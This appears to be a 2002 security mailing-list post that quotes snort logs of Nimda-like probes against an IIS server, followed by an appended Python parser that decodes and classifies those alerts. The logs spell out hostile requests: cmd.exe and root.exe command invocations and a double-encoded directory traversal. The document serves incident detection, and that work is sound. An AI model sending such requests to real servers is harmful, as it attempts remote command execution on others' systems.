Over the last few days I have been seeing increasing numbers (now up to 3 or 4 per hour) of Nimda-like attacks against web servers. Unlike Nimda, which normally does 15 probes, this new variant only does 4 probes, as illustrated in these snort logs:

[**] WEB-IIS CodeRed v2 root.exe access [**]
04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x7E
64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x4262A517  Ack: 0x6CBA93E  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86
64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x42AA87EB  Ack: 0x67C77D4  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86
64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x43380090  Ack: 0x74BEA3A  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-IIS _mem_bin access [**]
04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0xAB
64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x4394DC62  Ack: 0x76C208B  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Has anyone caught one of these in a honeypot? If it really is something new then the anti-virus vendors need to know about it...

--
Russell Fulton, Computer and Network Security Officer
The University of Auckland, New Zealand

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed May 01 2002 - 08:40:23 PDT
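The four dumps in the post, handled the way a defender would want to handle them in bulk: the following is an added example (not code from the post, the list, or snort) that parses snort -d alert dumps, rebuilds each HTTP request line from the hex payload columns, normalises the IIS encoding tricks visible above (%255c double-encoding, backslashes, ../ traversal) so equivalent cmd.exe probes compare equal, and counts probes per source/destination pair so a 4-probe sweep can be told apart from the 15-probe pattern the post attributes to Nimda. The sample alert text is constructed from the four dumps above (flag lines trimmed); the 4 and 15 thresholds are the counts the post gives; all function names are assumptions of this example.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in snort -d layout: the four alerts quoted in the post,
# reduced to the lines this parser reads (signature, timestamp, IP line, hex dump).
SAMPLE_ALERTS = """\
[**] WEB-IIS CodeRed v2 root.exe access [**]
04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x7E
64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214 IpLen:20 DgmLen:112 DF
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
[**] WEB-IIS cmd.exe access [**]
04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86
64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884 IpLen:20 DgmLen:120 DF
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS cmd.exe access [**]
04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86
64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005 IpLen:20 DgmLen:120 DF
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS _mem_bin access [**]
04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0xAB
64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401 IpLen:20 DgmLen:157 DF
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....
"""

HEADER_RE = re.compile(r"^\[\*\*\] (?P<sig>.+?) \[\*\*\]$")
TIME_RE = re.compile(r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) ")
IP_RE = re.compile(r"^(?P<src>\d+(?:\.\d+){3}):\d+ -> (?P<dst>\d+(?:\.\d+){3}):\d+ TCP")


def hex_bytes(line):
    """Leading hex-pair tokens of a dump line (snort prints at most 16 per line;
    the cap keeps the ASCII column from being misread as data)."""
    out = []
    for tok in line.split():
        if len(out) == 16 or not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            break
        out.append(tok)
    return out


def parse_block(block):
    """One alert block -> record with sig/ts/src/dst/request/uri, or None."""
    rec, hexparts = {}, []
    for line in block.splitlines():
        if (m := HEADER_RE.match(line)):
            rec["sig"] = m["sig"]
        elif (m := TIME_RE.match(line)):
            rec["ts"] = m["ts"]
        elif (m := IP_RE.match(line)):
            rec.update(src=m["src"], dst=m["dst"])
        else:
            hexparts += hex_bytes(line)
    if "src" not in rec or not hexparts:
        return None
    payload = bytes.fromhex("".join(hexparts))
    # The request line is everything before the first CRLF; latin-1 never fails.
    rec["request"] = payload.split(b"\r\n", 1)[0].decode("latin-1")
    parts = rec["request"].split()
    rec["uri"] = parts[1] if len(parts) > 1 else ""
    return rec


def parse_alerts(text):
    blocks = re.split(r"^=\+=\+.*$", text, flags=re.M)
    return [r for b in blocks if (r := parse_block(b))]


def normalise_uri(uri):
    """Make equivalent probes compare equal: bounded repeated percent-decoding
    (%255c -> %5c -> backslash), backslash to slash, lower-case, then normpath
    to resolve ../ traversal. Returns (target path, query string)."""
    path, _, query = uri.partition("?")
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return posixpath.normpath(path.replace("\\", "/").lower()), query


def summarise(alerts):
    """Group probes per (src, dst) in time order and label the sweep length
    using the counts from the post (15 for Nimda, 4 for the short variant)."""
    groups = defaultdict(list)
    for a in sorted(alerts, key=lambda a: a.get("ts", "")):
        groups[(a["src"], a["dst"])].append(a)
    report = {}
    for key, recs in groups.items():
        targets = [normalise_uri(r["uri"])[0] for r in recs]
        n = len(recs)
        variant = ("full Nimda-style sweep (15+ probes)" if n >= 15 else
                   "short 4-probe variant" if n == 4 else
                   "partial or unknown (%d probes)" % n)
        report[key] = {"probes": n, "first": recs[0].get("ts"), "last": recs[-1].get("ts"),
                       "targets": targets, "variant": variant,
                       "binaries": sorted({posixpath.basename(t) for t in targets})}
    return report
```

Running `summarise(parse_alerts(SAMPLE_ALERTS))` yields one group for 64.252.104.224 -> 130.216.239.5 with four probes in eight seconds, labelled as the short variant; the normalised targets show that the `_mem_bin` request, once double-decoded and traversal-resolved, is just another `/winnt/system32/cmd.exe` probe, which is the property a signature or log-correlation rule should key on rather than the raw encoded string.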